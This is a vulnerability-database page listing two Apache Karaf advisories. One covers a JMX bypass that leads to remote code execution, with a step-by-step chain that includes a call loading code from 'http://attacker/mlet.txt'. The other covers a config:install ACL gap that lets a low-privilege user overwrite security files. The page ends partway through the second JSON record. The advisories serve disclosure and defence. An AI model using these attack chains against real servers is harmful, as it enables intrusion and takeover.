Search

Find a vulnerability

Search criteria

    30 vulnerabilities found for Apache Karaf by Apache Software Foundation

    CVE-2026-92142 (GCVE-0-2026-92142)

    Vulnerability from nvd – Published: 2026-09-29 08:40 – Updated: 2026-10-01 14:24
    VLAI
    Title
    Apache Karaf: Authorization bypass in JMX MBean lifecycle operations
    Summary
    Apache Karaf exposes a JMX MBeanServer guarded by KarafMBeanServerGuard, which enforces role-based access control (RBAC) on MBean operations invoked over the remote JMX connector (RMI registry/server, enabled by default on ports 1099 and 44444). The guard is implemented as a java.lang.reflect.Proxy around the MBeanServer, and only forwards a fixed list of operation names to the RBAC check, defined in MBeanInvocationHandler#guarded:   private final List<String> guarded = Collections.unmodifiableList( Arrays.asList("invoke", "getAttribute", "getAttributes", "setAttribute", "setAttributes")); The MBean lifecycle operations MBeanServer#createMBean, #registerMBean and #unregisterMBean are not in this list. Calls to these methods are forwarded directly to the underlying MBeanServer with no role check at all, regardless of the roles configured in etc/jmx.acl.*.cfg. As a result, any user who can authenticate to the JMX endpoint, including a user holding only the least-privileged "viewer" role, can call createMBean() to instantiate an arbitrary class as a MBean, and unregisterMBean() to remove it again afterwards, with no authorization check and no audit log entry (logging in KarafMBeanServerGuard only occurs on the RBAC-denial path, which this bypass never reaches). This is significant because javax.management.loading.MLet, a standard JDK MBean, can be instantiated this way. MLet acts as a remote classloader: its getMBeansFromURL(URL) operation fetches an MLet text file from an attacker-controlled URL and instantiates and registers the classes it lists as new MBeans in the target JVM. Reaching this operation still goes through KarafMBeanServerGuard's existing "invoke" check, but the default etc/jmx.acl.cfg grants the "viewer" role to any method name matching the wildcard rule "get* = viewer", a heuristic intended for read-only getters. Because "getMBeansFromURL" happens to start with "get", it also matches that rule, so a default installation grants "viewer" callers permission to invoke it without any Karaf-specific ACL naming MLet at all. Combined with the createMBean gap, this gives a "viewer"-role JMX client a path to remote code execution to the Karaf JVM: * Authenticate to JMX as any user with any role (e.g. "viewer"). * mbs.createMBean("javax.management.loading.MLet", objectName) is not in GUARDED_OPERATIONS, no RBAC check, MLet is instantiated and registered. * mbs.invoke(objectName, "getMBeansFromURL", new Object[]{"http://attacker/mlet.txt"}, ...) is guarded, but the method name matches the default "get* = viewer" ACL rule, so permitted. * The remote .mlet file is fetched and its listed classes are loaded and registered as new MBeans, running attacker-supplied code in the Karaf JVM. * mbs.unregisterMBean(objectName) can be used to remove the MLet afterwards, also not in GUARDED_OPERATIONS, no RBAC check, no audit trail. The fix adds createMBean, registerMBean and unregisterMBean to the guarded operation list, resolves required roles for them from the jmx.acl* configuration by ObjectName and (for createMBean/registerMBean) MBean class name, and ships default etc/jmx.acl.cfg entries restricting all three operations to the "admin" role. This allows deployments to also write class-name-specific rule, e.g.: createMBean(java.lang.String)[/javax\.management\.loading\..*/] = admin Apache Karaf users should upgrade to 4.4.12 or 4.5.0 or later, once released, as soon as possible. Until an upgrade is available, restrict network access to the JMX RMI registry/server ports (1099/44444) to trusted hosts, or avoid issuing any non-"admin" JMX credentiels.
    SSVC
    Exploitation: none Automatable: no Technical Impact: total
    CISA Coordinator · CISA-ADP (v2.0.3)
    Decision recorded 2026-10-01 14:23 UTC
    CWE
    Impacted products
    Vendor Product Version
    Apache Software Foundation Apache Karaf Affected: 0 , < 4.4.12 (semver)
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2026-09-29T09:15:50.700Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "url": "http://www.openwall.com/lists/oss-security/2026/09/28/11"
              }
            ],
            "title": "CVE Program Container"
          },
          {
            "metrics": [
              {
                "cvssV3_1": {
                  "attackComplexity": "LOW",
                  "attackVector": "NETWORK",
                  "availabilityImpact": "HIGH",
                  "baseScore": 8.8,
                  "baseSeverity": "HIGH",
                  "confidentialityImpact": "HIGH",
                  "integrityImpact": "HIGH",
                  "privilegesRequired": "LOW",
                  "scope": "UNCHANGED",
                  "userInteraction": "NONE",
                  "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                  "version": "3.1"
                }
              },
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-92142",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "total"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-10-01T14:23:22.077130Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-10-01T14:24:03.845Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "Apache Karaf",
              "vendor": "Apache Software Foundation",
              "versions": [
                {
                  "lessThan": "4.4.12",
                  "status": "affected",
                  "version": "0",
                  "versionType": "semver"
                }
              ]
            }
          ],
          "credits": [
            {
              "lang": "en",
              "type": "reporter",
              "value": "MopMonk-AI \u003cmopmonk-ai@tophant.com\u003e"
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "Apache Karaf exposes a JMX MBeanServer guarded by\u0026nbsp;\u003ccode\u003eKarafMBeanServerGuard\u003c/code\u003e, which enforces role-based access control (RBAC) on MBean operations invoked over the remote JMX connector (RMI registry/server, enabled by default on ports 1099 and 44444). The guard is implemented as a j\u003ccode\u003eava.lang.reflect.Proxy\u003c/code\u003e\u0026nbsp;around the MBeanServer, and only forwards a fixed list of operation names to the RBAC check, defined in\u0026nbsp;\u003ccode\u003eMBeanInvocationHandler#guarded\u003c/code\u003e:\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003e\u003ccode\u003e\u0026nbsp; private final List\u0026lt;String\u0026gt; guarded = Collections.unmodifiableList( Arrays.asList(\"invoke\", \"getAttribute\", \"getAttributes\", \"setAttribute\", \"setAttributes\"));\u003c/code\u003e\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003eThe MBean lifecycle operations\u0026nbsp;\u003ccode\u003eMBeanServer#createMBean\u003c/code\u003e,\u0026nbsp;\u003ccode\u003e#registerMBean\u003c/code\u003e\u0026nbsp;and\u0026nbsp;\u003ccode\u003e#unregisterMBean\u003c/code\u003e\u0026nbsp;are not in this list. Calls to these methods are forwarded directly to the underlying\u0026nbsp;\u003ccode\u003eMBeanServer\u003c/code\u003e\u0026nbsp;with no role check at all, regardless of the roles configured in\u0026nbsp;\u003cspan\u003eetc/jmx.acl.*.cfg.\u003c/span\u003e\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003eAs a result, any user who can authenticate to the JMX endpoint, including a user holding only the least-privileged \"\u003ccode\u003eviewer\u003c/code\u003e\" role, can call\u0026nbsp;\u003ccode\u003ecreateMBean()\u003c/code\u003e\u0026nbsp;to instantiate an arbitrary class as a MBean, and\u0026nbsp;\u003ccode\u003eunregisterMBean()\u003c/code\u003e\u0026nbsp;to remove it again afterwards, with no authorization check and no audit log entry (logging in\u0026nbsp;\u003ccode\u003eKarafMBeanServerGuard\u003c/code\u003e\u0026nbsp;only occurs on the RBAC-denial path, which this bypass never reaches).\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003eThis is significant because\u0026nbsp;\u003ccode\u003ejavax.management.loading.MLet\u003c/code\u003e, a standard JDK MBean, can be instantiated this way.\u0026nbsp;\u003ccode\u003eMLet\u003c/code\u003e\u0026nbsp;acts as a remote classloader: its\u0026nbsp;\u003ccode\u003egetMBeansFromURL(URL)\u003c/code\u003e\u0026nbsp;operation fetches an\u0026nbsp;\u003ccode\u003eMLet\u003c/code\u003e\u0026nbsp;text file from an attacker-controlled URL and instantiates and registers the classes it lists as new MBeans in the target JVM. Reaching this operation still goes through\u0026nbsp;\u003ccode\u003eKarafMBeanServerGuard\u003c/code\u003e\u0027s existing \"invoke\" check, but the default\u0026nbsp;\u003ccode\u003eetc/jmx.acl.cfg\u003c/code\u003e\u0026nbsp;grants the \"\u003ccode\u003eviewer\u003c/code\u003e\" role to any method name matching the wildcard rule \"\u003ccode\u003eget* = viewer\u003c/code\u003e\", a heuristic intended for read-only getters. Because \"\u003ccode\u003egetMBeansFromURL\u003c/code\u003e\" happens to start with \"\u003ccode\u003eget\u003c/code\u003e\", it also matches that rule, so a default installation grants \"viewer\" callers permission to invoke it without any Karaf-specific ACL naming\u0026nbsp;\u003ccode\u003eMLet\u003c/code\u003e\u0026nbsp;at all. Combined with the createMBean gap, this gives a \"\u003ccode\u003eviewer\u003c/code\u003e\"-role JMX client a path to remote code execution to the Karaf JVM:\u003c/div\u003e\u003cdiv\u003e\u003col\u003e\u003cli\u003eAuthenticate to JMX as any user with any role (e.g. \"\u003ccode\u003eviewer\u003c/code\u003e\").\u003c/li\u003e\u003cli\u003e\u003ccode\u003embs.createMBean(\"javax.management.loading.MLet\", objectName)\u003c/code\u003e\u0026nbsp;is not in\u0026nbsp;\u003ccode\u003eGUARDED_OPERATIONS\u003c/code\u003e, no RBAC check, MLet is instantiated and registered.\u003c/li\u003e\u003cli\u003e\u003ccode\u003embs.invoke(objectName, \"getMBeansFromURL\", new Object[]{\"http://attacker/mlet.txt\"}, ...)\u003c/code\u003e\u0026nbsp;is guarded, but the method name matches the default \"\u003ccode\u003eget* = viewer\u003c/code\u003e\" ACL rule, so permitted.\u003c/li\u003e\u003cli\u003eThe remote\u0026nbsp;\u003ccode\u003e.mlet\u003c/code\u003e\u0026nbsp;file is fetched and its listed classes are loaded and registered as new MBeans, running attacker-supplied code in the Karaf JVM.\u003c/li\u003e\u003cli\u003e\u003ccode\u003embs.unregisterMBean(objectName)\u003c/code\u003e\u0026nbsp;can be used to remove the MLet afterwards, also not in\u0026nbsp;\u003ccode\u003eGUARDED_OPERATIONS\u003c/code\u003e, no RBAC check, no audit trail.\u003c/li\u003e\u003c/ol\u003e\u003c/div\u003e\u003cdiv\u003eThe fix adds\u0026nbsp;\u003ccode\u003ecreateMBean\u003c/code\u003e,\u0026nbsp;\u003ccode\u003eregisterMBean\u003c/code\u003e\u0026nbsp;and\u0026nbsp;\u003ccode\u003eunregisterMBean\u003c/code\u003e\u0026nbsp;to the guarded operation list, resolves required roles for them from the\u0026nbsp;\u003ccode\u003ejmx.acl*\u003c/code\u003e\u0026nbsp;configuration by\u0026nbsp;\u003ccode\u003eObjectName\u003c/code\u003e\u0026nbsp;and (for\u0026nbsp;\u003ccode\u003ecreateMBean\u003c/code\u003e/\u003ccode\u003eregisterMBean\u003c/code\u003e) MBean class name, and ships default\u0026nbsp;\u003ccode\u003eetc/jmx.acl.cfg\u003c/code\u003e\u0026nbsp;entries restricting all three operations to the \"\u003ccode\u003eadmin\u003c/code\u003e\" role. This allows deployments to also write class-name-specific rule, e.g.:\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003e\u003ccode\u003ecreateMBean(java.lang.String)[/javax\\.management\\.loading\\..*/] = admin\u003c/code\u003e\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003eApache Karaf users should upgrade to 4.4.12 or 4.5.0 or later, once released, as soon as possible. Until an upgrade is available, restrict network access to the JMX RMI registry/server ports (1099/44444) to trusted hosts, or avoid issuing any non-\"\u003ccode\u003eadmin\u003c/code\u003e\" JMX credentiels.\u003c/div\u003e"
                }
              ],
              "value": "Apache Karaf exposes a JMX MBeanServer guarded by\u00a0KarafMBeanServerGuard, which enforces role-based access control (RBAC) on MBean operations invoked over the remote JMX connector (RMI registry/server, enabled by default on ports 1099 and 44444). The guard is implemented as a java.lang.reflect.Proxy\u00a0around the MBeanServer, and only forwards a fixed list of operation names to the RBAC check, defined in\u00a0MBeanInvocationHandler#guarded:\n\n\n\u00a0 private final List\u003cString\u003e guarded = Collections.unmodifiableList( Arrays.asList(\"invoke\", \"getAttribute\", \"getAttributes\", \"setAttribute\", \"setAttributes\"));\n\n\n\n\nThe MBean lifecycle operations\u00a0MBeanServer#createMBean,\u00a0#registerMBean\u00a0and\u00a0#unregisterMBean\u00a0are not in this list. Calls to these methods are forwarded directly to the underlying\u00a0MBeanServer\u00a0with no role check at all, regardless of the roles configured in\u00a0etc/jmx.acl.*.cfg.\n\n\n\n\nAs a result, any user who can authenticate to the JMX endpoint, including a user holding only the least-privileged \"viewer\" role, can call\u00a0createMBean()\u00a0to instantiate an arbitrary class as a MBean, and\u00a0unregisterMBean()\u00a0to remove it again afterwards, with no authorization check and no audit log entry (logging in\u00a0KarafMBeanServerGuard\u00a0only occurs on the RBAC-denial path, which this bypass never reaches).\n\n\n\n\nThis is significant because\u00a0javax.management.loading.MLet, a standard JDK MBean, can be instantiated this way.\u00a0MLet\u00a0acts as a remote classloader: its\u00a0getMBeansFromURL(URL)\u00a0operation fetches an\u00a0MLet\u00a0text file from an attacker-controlled URL and instantiates and registers the classes it lists as new MBeans in the target JVM. Reaching this operation still goes through\u00a0KarafMBeanServerGuard\u0027s existing \"invoke\" check, but the default\u00a0etc/jmx.acl.cfg\u00a0grants the \"viewer\" role to any method name matching the wildcard rule \"get* = viewer\", a heuristic intended for read-only getters. Because \"getMBeansFromURL\" happens to start with \"get\", it also matches that rule, so a default installation grants \"viewer\" callers permission to invoke it without any Karaf-specific ACL naming\u00a0MLet\u00a0at all. Combined with the createMBean gap, this gives a \"viewer\"-role JMX client a path to remote code execution to the Karaf JVM:\n\n  *  Authenticate to JMX as any user with any role (e.g. \"viewer\").\n  *  mbs.createMBean(\"javax.management.loading.MLet\", objectName)\u00a0is not in\u00a0GUARDED_OPERATIONS, no RBAC check, MLet is instantiated and registered.\n  *  mbs.invoke(objectName, \"getMBeansFromURL\", new Object[]{\"http://attacker/mlet.txt\"}, ...)\u00a0is guarded, but the method name matches the default \"get* = viewer\" ACL rule, so permitted.\n  *  The remote\u00a0.mlet\u00a0file is fetched and its listed classes are loaded and registered as new MBeans, running attacker-supplied code in the Karaf JVM.\n  *  mbs.unregisterMBean(objectName)\u00a0can be used to remove the MLet afterwards, also not in\u00a0GUARDED_OPERATIONS, no RBAC check, no audit trail.\n\n\nThe fix adds\u00a0createMBean,\u00a0registerMBean\u00a0and\u00a0unregisterMBean\u00a0to the guarded operation list, resolves required roles for them from the\u00a0jmx.acl*\u00a0configuration by\u00a0ObjectName\u00a0and (for\u00a0createMBean/registerMBean) MBean class name, and ships default\u00a0etc/jmx.acl.cfg\u00a0entries restricting all three operations to the \"admin\" role. This allows deployments to also write class-name-specific rule, e.g.:\n\n\n\n\ncreateMBean(java.lang.String)[/javax\\.management\\.loading\\..*/] = admin\n\n\n\n\nApache Karaf users should upgrade to 4.4.12 or 4.5.0 or later, once released, as soon as possible. Until an upgrade is available, restrict network access to the JMX RMI registry/server ports (1099/44444) to trusted hosts, or avoid issuing any non-\"admin\" JMX credentiels."
            }
          ],
          "metrics": [
            {
              "other": {
                "content": {
                  "text": "important"
                },
                "type": "Textual description of severity"
              },
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-862",
                  "description": "CWE-862",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-09-29T08:40:07.961Z",
            "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
            "shortName": "apache"
          },
          "references": [
            {
              "tags": [
                "vendor-advisory"
              ],
              "url": "https://karaf.apache.org/security/cve-2026-92142.txt"
            }
          ],
          "source": {
            "discovery": "EXTERNAL"
          },
          "title": "Apache Karaf: Authorization bypass in JMX MBean lifecycle operations",
          "x_generator": {
            "engine": "Vulnogram 1.0.3"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
        "assignerShortName": "apache",
        "cveId": "CVE-2026-92142",
        "datePublished": "2026-09-29T08:40:07.961Z",
        "dateReserved": "2026-09-15T16:59:01.764Z",
        "dateUpdated": "2026-10-01T14:24:03.845Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-91085 (GCVE-0-2026-91085)

    Vulnerability from nvd – Published: 2026-09-29 08:39 – Updated: 2026-10-01 14:18
    VLAI
    Title
    Apache Karaf: config:install missing ACL entry allows privilege escalation to admin
    Summary
    Apache Karaf's shell/SSH command security is enforced by per-scope ACL configuration files (etc/org.apache.karaf.command.acl.<scope>.cfg). SecuredSessionFactoryImpl.checkSecurity() resolves the roles required for an invocation and, when no ACL rule matches the command, fails open: ACLConfigurationParser.Specificity.NO_MATCH sets passCheck = true. The safety valve for this, karaf.secured.command.compulsory.roles, ships commented out in etc/system.properties, so an unmatched command is allowed for any authenticated user. The shipped org.apache.karaf.command.acl.config ACL (assemblies/features/standard/src/main/feature/feature.xml, mirrored into instance/.../etc/org.apache.karaf.command.acl.config.cfg) has no install entry. It restricts delete to admin, restricts edit/property-*/update on the jmx.acl.*, org.apache.karaf.command.acl.* and org.apache.karaf.service.acl.* PIDs to admin, and allows manager for everything else, but config:install was simply unmatched, and therefore allowed for any authenticated user, including one holding only the viewer role. config:install <url> <finalname> fetches url and writes it into ${karaf.etc} as finalname. It calls PathUtils.checkWithin() to block .. traversal outside karaf.etc, but that folder holds every security-relevant file Karaf ships: users.properties, keys.properties, host.key, and all org.apache.karaf.*.acl.* files, including the very ACL file that (mis)governs this command. With -o/--override, an existing file is overwritten with attacker-controlled bytes fetched from an arbitrary URL. Because felix.fileinstall.dir = ${karaf.etc} (etc/config.properties), Felix FileInstall also watches and reloads any .cfg file dropped there, closing the loop without requiring a restart. By contrast, bundle:install, feature:install and kar:install are all admin-only in their own ACLs, and config:delete is admin in this same ACL, config:install was the outlier. MitigationAdd install = admin in etc/org.apache.karaf.command.acl.config.cfg (create the file is absent), and/or set karaf.secured.command.compulsory.roles=admin in etc/system.properties (and restart) to make unmatched commands fail closed by default.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator · CISA-ADP (v2.0.3)
    Decision recorded 2026-10-01 14:17 UTC
    CWE
    Impacted products
    Vendor Product Version
    Apache Software Foundation Apache Karaf Affected: 0 , < 4.4.12 (semver)
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2026-09-29T09:15:47.789Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "url": "http://www.openwall.com/lists/oss-security/2026/09/28/10"
              }
            ],
            "title": "CVE Program Container"
          },
          {
            "metrics": [
              {
                "cvssV3_1": {
                  "attackComplexity": "LOW",
                  "attackVector": "NETWORK",
                  "availabilityImpact": "LOW",
                  "baseScore": 6.3,
                  "baseSeverity": "MEDIUM",
                  "confidentialityImpact": "LOW",
                  "integrityImpact": "LOW",
                  "privilegesRequired": "LOW",
                  "scope": "UNCHANGED",
                  "userInteraction": "NONE",
                  "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
                  "version": "3.1"
                }
              },
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-91085",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-10-01T14:17:41.304608Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-10-01T14:18:12.957Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "Apache Karaf",
              "vendor": "Apache Software Foundation",
              "versions": [
                {
                  "lessThan": "4.4.12",
                  "status": "affected",
                  "version": "0",
                  "versionType": "semver"
                }
              ]
            }
          ],
          "credits": [
            {
              "lang": "en",
              "type": "reporter",
              "value": "Rin Ray \u003crindilray@gmail.com\u003e"
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "Apache Karaf\u0027s shell/SSH command security is enforced by per-scope ACL configuration files (\u003ccode\u003eetc/org.apache.karaf.command.acl.\u0026lt;scope\u0026gt;.cfg\u003c/code\u003e).\u0026nbsp;\u003ccode\u003eSecuredSessionFactoryImpl.checkSecurity()\u003c/code\u003e\u0026nbsp;resolves the roles required for an invocation and, when no ACL rule matches the command, \u003cb\u003efails open\u003c/b\u003e:\u0026nbsp;\u003ccode\u003eACLConfigurationParser.Specificity.NO_MATCH\u003c/code\u003e\u0026nbsp;sets\u0026nbsp;\u003ccode\u003epassCheck = true\u003c/code\u003e. The safety valve for this,\u0026nbsp;\u003ccode\u003ekaraf.secured.command.compulsory.roles\u003c/code\u003e, ships commented out in\u0026nbsp;\u003ccode\u003eetc/system.properties\u003c/code\u003e, so an unmatched command is allowed for any authenticated user.\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003eThe shipped\u0026nbsp;\u003ccode\u003eorg.apache.karaf.command.acl.config\u003c/code\u003e\u0026nbsp;ACL (\u003ccode\u003eassemblies/features/standard/src/main/feature/feature.xml\u003c/code\u003e, mirrored into\u0026nbsp;\u003ccode\u003einstance/.../etc/org.apache.karaf.command.acl.config.cfg\u003c/code\u003e) has no\u0026nbsp;\u003ccode\u003einstall\u003c/code\u003e\u0026nbsp;entry. It restricts\u0026nbsp;\u003ccode\u003edelete\u003c/code\u003e\u0026nbsp;to\u0026nbsp;\u003ccode\u003eadmin\u003c/code\u003e, restricts\u0026nbsp;\u003ccode\u003eedit\u003c/code\u003e/\u003ccode\u003eproperty-*\u003c/code\u003e/\u003ccode\u003eupdate\u003c/code\u003e\u0026nbsp;on the\u0026nbsp;\u003ccode\u003ejmx.acl.*\u003c/code\u003e,\u0026nbsp;\u003ccode\u003eorg.apache.karaf.command.acl.*\u003c/code\u003e\u0026nbsp;and\u0026nbsp;\u003ccode\u003eorg.apache.karaf.service.acl.*\u003c/code\u003e\u0026nbsp;PIDs to\u0026nbsp;\u003ccode\u003eadmin\u003c/code\u003e, and allows\u0026nbsp;\u003ccode\u003emanager\u003c/code\u003e\u0026nbsp;for everything else, but\u0026nbsp;\u003ccode\u003econfig:install\u003c/code\u003e\u0026nbsp;was simply unmatched, and therefore allowed for any authenticated user, including one holding only the\u0026nbsp;\u003ccode\u003eviewer\u003c/code\u003e\u0026nbsp;role.\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003e\u003cspan\u003econfig:install \u0026lt;url\u0026gt; \u0026lt;finalname\u0026gt;\u003c/span\u003e\u0026nbsp;fetches\u0026nbsp;\u003ccode\u003eurl\u003c/code\u003e\u0026nbsp;and writes it into\u0026nbsp;\u003ccode\u003e${karaf.etc}\u003c/code\u003e\u0026nbsp;as\u0026nbsp;\u003ccode\u003efinalname\u003c/code\u003e. It calls\u0026nbsp;\u003ccode\u003ePathUtils.checkWithin()\u003c/code\u003e\u0026nbsp;to block\u0026nbsp;\u003ccode\u003e..\u003c/code\u003e\u0026nbsp;traversal outside\u0026nbsp;\u003ccode\u003ekaraf.etc\u003c/code\u003e, but that folder holds every security-relevant file Karaf ships:\u0026nbsp;\u003ccode\u003eusers.properties\u003c/code\u003e,\u0026nbsp;\u003ccode\u003ekeys.properties\u003c/code\u003e,\u0026nbsp;\u003ccode\u003ehost.key\u003c/code\u003e, and all\u0026nbsp;\u003ccode\u003eorg.apache.karaf.*.acl.*\u003c/code\u003e\u0026nbsp;files, including the very ACL file that (mis)governs this command. With\u0026nbsp;\u003ccode\u003e-o\u003c/code\u003e/\u003ccode\u003e--override\u003c/code\u003e, an existing file is overwritten with attacker-controlled bytes fetched from an arbitrary URL.\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003eBecause\u0026nbsp;\u003ccode\u003efelix.fileinstall.dir = ${karaf.etc}\u003c/code\u003e\u0026nbsp;(\u003ccode\u003eetc/config.properties\u003c/code\u003e), Felix FileInstall also watches and reloads any\u0026nbsp;\u003ccode\u003e.cfg\u003c/code\u003e\u0026nbsp;file dropped there, closing the loop without requiring a restart.\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003eBy contrast,\u0026nbsp;\u003ccode\u003ebundle:install\u003c/code\u003e,\u0026nbsp;\u003ccode\u003efeature:install\u003c/code\u003e\u0026nbsp;and\u0026nbsp;\u003ccode\u003ekar:install\u003c/code\u003e\u0026nbsp;are all\u0026nbsp;\u003ccode\u003eadmin\u003c/code\u003e-only in their own ACLs, and\u0026nbsp;\u003ccode\u003econfig:delete\u003c/code\u003e\u0026nbsp;is\u0026nbsp;\u003ccode\u003eadmin\u003c/code\u003e\u0026nbsp;in this same ACL,\u0026nbsp;\u003ccode\u003econfig:install\u003c/code\u003e\u0026nbsp;was the outlier.\u003c/div\u003e\u003ch3\u003eMitigation\u003c/h3\u003e\u003cdiv\u003eAdd\u0026nbsp;\u003ccode\u003einstall = admin\u003c/code\u003e\u0026nbsp;in\u0026nbsp;\u003ccode\u003eetc/org.apache.karaf.command.acl.config.cfg\u003c/code\u003e\u0026nbsp;(create the file is absent), and/or set\u0026nbsp;\u003ccode\u003ekaraf.secured.command.compulsory.roles=admin\u003c/code\u003e\u0026nbsp;in\u0026nbsp;\u003ccode\u003eetc/system.properties\u003c/code\u003e\u0026nbsp;(and restart) to make unmatched commands fail closed by default.\u003c/div\u003e"
                }
              ],
              "value": "Apache Karaf\u0027s shell/SSH command security is enforced by per-scope ACL configuration files (etc/org.apache.karaf.command.acl.\u003cscope\u003e.cfg).\u00a0SecuredSessionFactoryImpl.checkSecurity()\u00a0resolves the roles required for an invocation and, when no ACL rule matches the command, fails open:\u00a0ACLConfigurationParser.Specificity.NO_MATCH\u00a0sets\u00a0passCheck = true. The safety valve for this,\u00a0karaf.secured.command.compulsory.roles, ships commented out in\u00a0etc/system.properties, so an unmatched command is allowed for any authenticated user.\n\n\nThe shipped\u00a0org.apache.karaf.command.acl.config\u00a0ACL (assemblies/features/standard/src/main/feature/feature.xml, mirrored into\u00a0instance/.../etc/org.apache.karaf.command.acl.config.cfg) has no\u00a0install\u00a0entry. It restricts\u00a0delete\u00a0to\u00a0admin, restricts\u00a0edit/property-*/update\u00a0on the\u00a0jmx.acl.*,\u00a0org.apache.karaf.command.acl.*\u00a0and\u00a0org.apache.karaf.service.acl.*\u00a0PIDs to\u00a0admin, and allows\u00a0manager\u00a0for everything else, but\u00a0config:install\u00a0was simply unmatched, and therefore allowed for any authenticated user, including one holding only the\u00a0viewer\u00a0role.\n\n\n\n\nconfig:install \u003curl\u003e \u003cfinalname\u003e\u00a0fetches\u00a0url\u00a0and writes it into\u00a0${karaf.etc}\u00a0as\u00a0finalname. It calls\u00a0PathUtils.checkWithin()\u00a0to block\u00a0..\u00a0traversal outside\u00a0karaf.etc, but that folder holds every security-relevant file Karaf ships:\u00a0users.properties,\u00a0keys.properties,\u00a0host.key, and all\u00a0org.apache.karaf.*.acl.*\u00a0files, including the very ACL file that (mis)governs this command. With\u00a0-o/--override, an existing file is overwritten with attacker-controlled bytes fetched from an arbitrary URL.\n\n\n\n\nBecause\u00a0felix.fileinstall.dir = ${karaf.etc}\u00a0(etc/config.properties), Felix FileInstall also watches and reloads any\u00a0.cfg\u00a0file dropped there, closing the loop without requiring a restart.\n\n\n\n\nBy contrast,\u00a0bundle:install,\u00a0feature:install\u00a0and\u00a0kar:install\u00a0are all\u00a0admin-only in their own ACLs, and\u00a0config:delete\u00a0is\u00a0admin\u00a0in this same ACL,\u00a0config:install\u00a0was the outlier.\n\nMitigationAdd\u00a0install = admin\u00a0in\u00a0etc/org.apache.karaf.command.acl.config.cfg\u00a0(create the file is absent), and/or set\u00a0karaf.secured.command.compulsory.roles=admin\u00a0in\u00a0etc/system.properties\u00a0(and restart) to make unmatched commands fail closed by default."
            }
          ],
          "metrics": [
            {
              "other": {
                "content": {
                  "text": "moderate"
                },
                "type": "Textual description of severity"
              },
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-862",
                  "description": "CWE-862",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-09-29T08:39:33.209Z",
            "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
            "shortName": "apache"
          },
          "references": [
            {
              "tags": [
                "vendor-advisory"
              ],
              "url": "https://karaf.apache.org/security/cve-2026-91085.txt"
            }
          ],
          "source": {
            "discovery": "EXTERNAL"
          },
          "title": "Apache Karaf: config:install missing ACL entry allows privilege escalation to admin",
          "x_generator": {
            "engine": "Vulnogram 1.0.3"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
        "assignerShortName": "apache",
        "cveId": "CVE-2026-91085",
        "datePublished": "2026-09-29T08:39:33.209Z",
        "dateReserved": "2026-09-14T17:55:38.562Z",
